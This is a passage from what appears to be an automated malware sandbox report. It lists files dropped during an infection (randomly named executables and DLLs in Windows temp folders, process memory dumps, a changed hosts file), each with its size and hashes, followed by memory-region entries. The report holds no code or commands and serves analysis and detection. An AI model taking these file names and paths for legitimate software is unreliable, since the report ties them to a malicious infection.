                                                4633b298d57014627831ccac89a2c50b

                                                SHA1

                                                e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                SHA256

                                                b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                SHA512

                                                29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                              • C:\Windows\TEMP\lntjubmbe\config.json

                                                Filesize

                                                693B

                                                MD5

                                                f2d396833af4aea7b9afde89593ca56e

                                                SHA1

                                                08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                                SHA256

                                                d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                                SHA512

                                                2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                              • C:\Windows\TEMP\ppgkyibiq\1020.dmp

                                                Filesize

                                                33.3MB

                                                MD5

                                                06e1bdb42f4e733edd88a4d6729d2f39

                                                SHA1

                                                af734b45d96f566aa009353cc165745a2f3f7a87

                                                SHA256

                                                a0d4cb9c0bbeb3573ec7c409d0335beee492faf41a543905a6c954f2de57e299

                                                SHA512

                                                ab075c740d98dfde822f4036b4bfe2612b5c411aae1ab86288023172fa5849f8d41974341a20c30e9ff25baef819120322e224924b2dac23b3e51f2cbc94bbc9

                                              • C:\Windows\TEMP\ppgkyibiq\1732.dmp

                                                Filesize

                                                4.1MB

                                                MD5

                                                debdb78ab008185c424623673a299b0b

                                                SHA1

                                                028fda12f0c6a01df6495ce540e21d2fd31e383f

                                                SHA256

                                                9a4a51cbec4abdb9f7118428215ea5e701bc08a0e02edfc81226203363daa268

                                                SHA512

                                                be2c15879eba87ddf41e0b97f01843a91c1177c984a9383c759d2ce07b1fe31c8251af11692602bf0d2cf791260a15aa0bfeefcaa69b8f14e9c4035c5fd9a729

                                              • C:\Windows\TEMP\ppgkyibiq\2156.dmp

                                                Filesize

                                                3.9MB

                                                MD5

                                                5faa3bc2f887fa0357575886ff5fe527

                                                SHA1

                                                5858315a0517c60eeb4910af03a275cdb048aeb8

                                                SHA256

                                                efe530e98e1c4783eaa71eb2fb7c6af083a6e495ab588f6dfc333974927bb1ff

                                                SHA512

                                                007619ea230c6bbbf6519bca04881411bd912f0ed7bbc0ab5aa4e1bf76326ab7203ac189f5a2015b27003fa74aeb6af2c1f3b1c00b7b513ea7fa84941c75f519

                                              • C:\Windows\TEMP\ppgkyibiq\2504.dmp

                                                Filesize

                                                7.5MB

                                                MD5

                                                6144e02927e8659820080f4367279464

                                                SHA1

                                                701d48c6b8ef0bb01efc25061f6b6cf771ed651c

                                                SHA256

                                                5c88073daee0973d217b228c47cc4be7bb619cf781dcb91a7d205da48123eb6b

                                                SHA512

                                                1d7585ccc3aeb969855144700b3f844fd9ecc0acab53472e04848effd14e4389ea349d3c3cc97389d4df8c6cf6a42e6b6fc449c1f5cb626cfb341f6b33a62b2e

                                              • C:\Windows\TEMP\ppgkyibiq\2832.dmp

                                                Filesize

                                                810KB

                                                MD5

                                                db15a23f35f8d9cf8ac83ee7fbfd9adc

                                                SHA1

                                                01d02c329a29c326245fa2bca414eff32f556450

                                                SHA256

                                                da59fec92701ef91e246eb270a8fc9b77e434336712d67d11f609e4bf30ddea5

                                                SHA512

                                                3615a30eb241fe88461b15e02e83633ff3a94bfe36df9dd609fcf99471f62f9ec22aade34f6c119a81c4796f0278df62cbec2646d03a1c7895a00ae0a8d77ef8

                                              • C:\Windows\TEMP\ppgkyibiq\3100.dmp

                                                Filesize

                                                2.9MB

                                                MD5

                                                44c32e64128c7c7000353d5db0676a19

                                                SHA1

                                                c385500cafd2e517da2b387b6ddd153d05e51bf6

                                                SHA256

                                                6bb79daac762fc11be16933821794d5f0e5dafc8da8a774b3e9fcc0f50a678bf

                                                SHA512

                                                3d7f0ae3cd0f39d840cac545c99f27c96880239879bde9f1fbaa4584e33403065fa606238ed75eb38f27a6060573925bc641e534744ac6a06e020b0a41398001

                                              • C:\Windows\TEMP\ppgkyibiq\3192.dmp

                                                Filesize

                                                8.5MB

                                                MD5

                                                3f3d4b2dd226f2802b779e391d0ba7f9

                                                SHA1

                                                2c6a7c1a348b4b923ba8b1b8fbc5ac6f89ffeae6

                                                SHA256

                                                59cdf8f32b201f2678a4c58d2ab81afe329c6862363fd31785a31c51c1fc52de

                                                SHA512

                                                36f3a48e4059b5444cbf37c7ad51d234d60b4b23ab24bc1679b3d92a24ee11ad3df7dbafe2ddd60912c81cf3f9a527125418ca6d077db3144aa2c1bdc9f878e2

                                              • C:\Windows\TEMP\ppgkyibiq\3364.dmp

                                                Filesize

                                                45.8MB

                                                MD5

                                                a4c5619b0bbdd22428d74a5d711dc24d

                                                SHA1

                                                0876e34f458c7229f3d7e654755591a3a1b4700b

                                                SHA256

                                                17fee117e5664f47c64efdc9ae8511bbafb0252a0b01e51b3c5a3676f04fa2e2

                                                SHA512

                                                757dd5ce2db951be0565c0a8757fe15bcf3537baa5a78343f0c9c9215f23324d55f2162b5baadbf55ddcb726b4a996fe7650618ad9f72bdcebb4532a1219ad52

                                              • C:\Windows\TEMP\ppgkyibiq\372.dmp

                                                Filesize

                                                1.2MB

                                                MD5

                                                a831924c93158053b2879a07818f704c

                                                SHA1

                                                90ce65d09687d49d16c2975d1912cad301741319

                                                SHA256

                                                69ded912f968e5d8158b318f72500c3466141df9de2e8f246f9d9505456e9144

                                                SHA512

                                                fe8ac6f0f9ca84830358ef4363940627afdd01ac08046057dae7a611694f835ce365b4abbf19d9300bae6062e5b11eccc2224568937d2e6341fd892c415c56ba

                                              • C:\Windows\TEMP\ppgkyibiq\3808.dmp

                                                Filesize

                                                3.1MB

                                                MD5

                                                9b78f794fac537dfbabccccc5180c2e4

                                                SHA1

                                                55d8755cb43e5bea882b9f809fcb6e7d572799d1

                                                SHA256

                                                96888fc9e29841a7fa7355b7bd1f23eaf9f0ecba79db07d1599e76a922432e8a

                                                SHA512

                                                df21ec318d37d570bfcb9bfa9fbad9bbbc8ec77872670494e11de6fd25bc6cdbedd8baeff2b14bce7de5750f6d18d8974f5f460b6b7f03dc60588407ab750b6f

                                              • C:\Windows\TEMP\ppgkyibiq\3908.dmp

                                                Filesize

                                                20.7MB

                                                MD5

                                                9717b297be9d0c11c5c6e50b2c5d6251

                                                SHA1

                                                429797c47eae766b05a009b604df23f1b636e501

                                                SHA256

                                                c4f9b8c151adba73d1590661eee13d7f860ec920d31b66f2eb95dcebe0cdabc5

                                                SHA512

                                                2270d21d4a7cf72f4ec5c21d9a24946934eac78fe2ac6a65697930bac4ebddfaf8b27a51ca2b73892138c15fd19e8cc7adc64d49c65d7a0e80fb3d2e0dde8672

                                              • C:\Windows\TEMP\ppgkyibiq\4004.dmp

                                                Filesize

                                                4.4MB

                                                MD5

                                                4ff890997f7eef07e92625cde0c41a89

                                                SHA1

                                                5811e91529e601f1088efe1bd7a61da1d6096afe

                                                SHA256

                                                2de6958d33cf935f56809bde0e23603e2534d87b3fe6c7054f5200440d23da3b

                                                SHA512

                                                10f4d8ebc997e20eeaf8f733a1ec88573212623a702281fb36fcdbbe2705f7c4ae2102f5bcc5e3ee62c13dfa147955db3ec8b3a77ba99da41892370f4bd8b8f1

                                              • C:\Windows\TEMP\ppgkyibiq\4460.dmp

                                                Filesize

                                                25.8MB

                                                MD5

                                                9b9010ef725f0bcfbc751b167fa1f22d

                                                SHA1

                                                672abe550f798c542461e4ceb3b35647c501e72b

                                                SHA256

                                                aecb6a36e6958bb494f73a25af2141bfe136dd113b55ea92a455167eba2f01b4

                                                SHA512

                                                1ab306647ae976e81ac57fb4acd46bbbff282fafd25e3d4866d0f1f2bb7de5ef3b3aaf0bef0179a4345683883cdb0496d037378312ca75744190820ea45bbf93

                                              • C:\Windows\TEMP\ppgkyibiq\768.dmp

                                                Filesize

                                                3.3MB

                                                MD5

                                                09dbc8738b10fdfd881a56c08a66e5fb

                                                SHA1

                                                d3a3c35e089f97c9567d8132953275cd342bf27b

                                                SHA256

                                                63f6c1b8da81d9cad6e7be5614ba9f2c67f530c35c7512fa2bbaf5aa6cc344ae

                                                SHA512

                                                022e77f92f6cb6d318f13a84f1a2297f6cabf9083f818b431fa013416d73fd7b901c14813ac68d5921f0fa96f74c359f7c36becf912304c6262918cb5d839f6b

                                              • C:\Windows\Temp\lntjubmbe\ttlnnh.exe

                                                Filesize

                                                343KB

                                                MD5

                                                2b4ac7b362261cb3f6f9583751708064

                                                SHA1

                                                b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                                SHA256

                                                a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                                SHA512

                                                c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                              • C:\Windows\Temp\nsq5418.tmp\System.dll

                                                Filesize

                                                11KB

                                                MD5

                                                2ae993a2ffec0c137eb51c8832691bcb

                                                SHA1

                                                98e0b37b7c14890f8a599f35678af5e9435906e1

                                                SHA256

                                                681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                SHA512

                                                2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                              • C:\Windows\Temp\nsq5418.tmp\nsExec.dll

                                                Filesize

                                                6KB

                                                MD5

                                                b648c78981c02c434d6a04d4422a6198

                                                SHA1

                                                74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                SHA256

                                                3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                SHA512

                                                219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                              • C:\Windows\Temp\ppgkyibiq\btjlhtrlh.exe

                                                Filesize

                                                126KB

                                                MD5

                                                e8d45731654929413d79b3818d6a5011

                                                SHA1

                                                23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                SHA256

                                                a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                SHA512

                                                df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                              • C:\Windows\Temp\xohudmc.exe

                                                Filesize

                                                72KB

                                                MD5

                                                cbefa7108d0cf4186cdf3a82d6db80cd

                                                SHA1

                                                73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                SHA256

                                                7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                SHA512

                                                b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                              • C:\Windows\ppgkyibiq\Corporate\vfshost.exe

                                                Filesize

                                                381KB

                                                MD5

                                                fd5efccde59e94eec8bb2735aa577b2b

                                                SHA1

                                                51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                SHA256

                                                441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                SHA512

                                                74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                              • C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe

                                                Filesize

                                                332KB

                                                MD5

                                                ea774c81fe7b5d9708caa278cf3f3c68

                                                SHA1

                                                fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                SHA256

                                                4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                SHA512

                                                7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                              • C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe

                                                Filesize

                                                424KB

                                                MD5

                                                e9c001647c67e12666f27f9984778ad6

                                                SHA1

                                                51961af0a52a2cc3ff2c4149f8d7011490051977

                                                SHA256

                                                7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                SHA512

                                                56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                              • C:\Windows\system32\drivers\etc\hosts

                                                Filesize

                                                1KB

                                                MD5

                                                c838e174298c403c2bbdf3cb4bdbb597

                                                SHA1

                                                70eeb7dfad9488f14351415800e67454e2b4b95b

                                                SHA256

                                                1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

                                                SHA512

                                                c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                              • C:\Windows\tllefmnq\yittybr.exe

                                                Filesize

                                                9.1MB

                                                MD5

                                                e07f5238a2c745578d39dffb5481efae

                                                SHA1

                                                3693f244afc8faf3c5826230e618a140dd8f94f9

                                                SHA256

                                                10dc8a3bb3d3ec66cd9df535176139d32187302fb8a6adfe933e59d4889ec33c

                                                SHA512

                                                fe57aba6e43adda7b88f2e444c1cdf3e5422821d3546996f23c2a55993be3ba3a0dec993d7e65c4e0727994c59a97630767bbe7289f429fb8f0908ab3ec1a965

                                              • memory/260-174-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/732-159-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/732-142-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/752-230-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/1096-184-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/1436-213-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/1636-227-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/1748-78-0x0000000000F50000-0x0000000000F9C000-memory.dmp

                                                Filesize

                                                304KB

                                              • memory/2420-223-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/3008-205-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/3228-170-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/3292-200-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/3612-192-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/3888-179-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/3980-161-0x0000000000400000-0x0000000000412000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/3980-149-0x0000000010000000-0x0000000010008000-memory.dmp

                                                Filesize

                                                32KB

                                              • memory/4424-232-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/4656-209-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/4700-244-0x0000000000450000-0x0000000000462000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/4844-218-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/4924-196-0x00007FF7DFB80000-0x00007FF7DFBDB000-memory.dmp

                                                Filesize

                                                364KB

                                              • memory/4964-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                Filesize

                                                6.6MB

                                              • memory/4996-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                Filesize

                                                6.6MB

                                              • memory/4996-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                Filesize

                                                6.6MB

                                              • memory/5004-164-0x00007FF7A3760000-0x00007FF7A3880000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/5004-220-0x00007FF7A3760000-0x00007FF7A3880000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/5004-135-0x00007FF6E7DA0000-0x00007FF6E7E8E000-memory.dmp

                                                Filesize

                                                952KB

                                              • memory/5004-215-0x00007FF7A3760000-0x00007FF7A3880000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/5004-138-0x00007FF6E7DA0000-0x00007FF6E7E8E000-memory.dmp

                                                Filesize

                                                952KB

                                              • memory/5004-202-0x00007FF7A3760000-0x00007FF7A3880000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/5004-181-0x00007FF7A3760000-0x00007FF7A3880000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/5004-167-0x000002259B470000-0x000002259B480000-memory.dmp

                                                Filesize

                                                64KB

                                              • memory/5004-233-0x00007FF7A3760000-0x00007FF7A3880000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/5004-234-0x00007FF7A3760000-0x00007FF7A3880000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/5004-177-0x00007FF7A3760000-0x00007FF7A3880000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/5004-248-0x00007FF7A3760000-0x00007FF7A3880000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/5004-252-0x00007FF7A3760000-0x00007FF7A3880000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/5004-364-0x00007FF7A3760000-0x00007FF7A3880000-memory.dmp

                                                Filesize

                                                1.1MB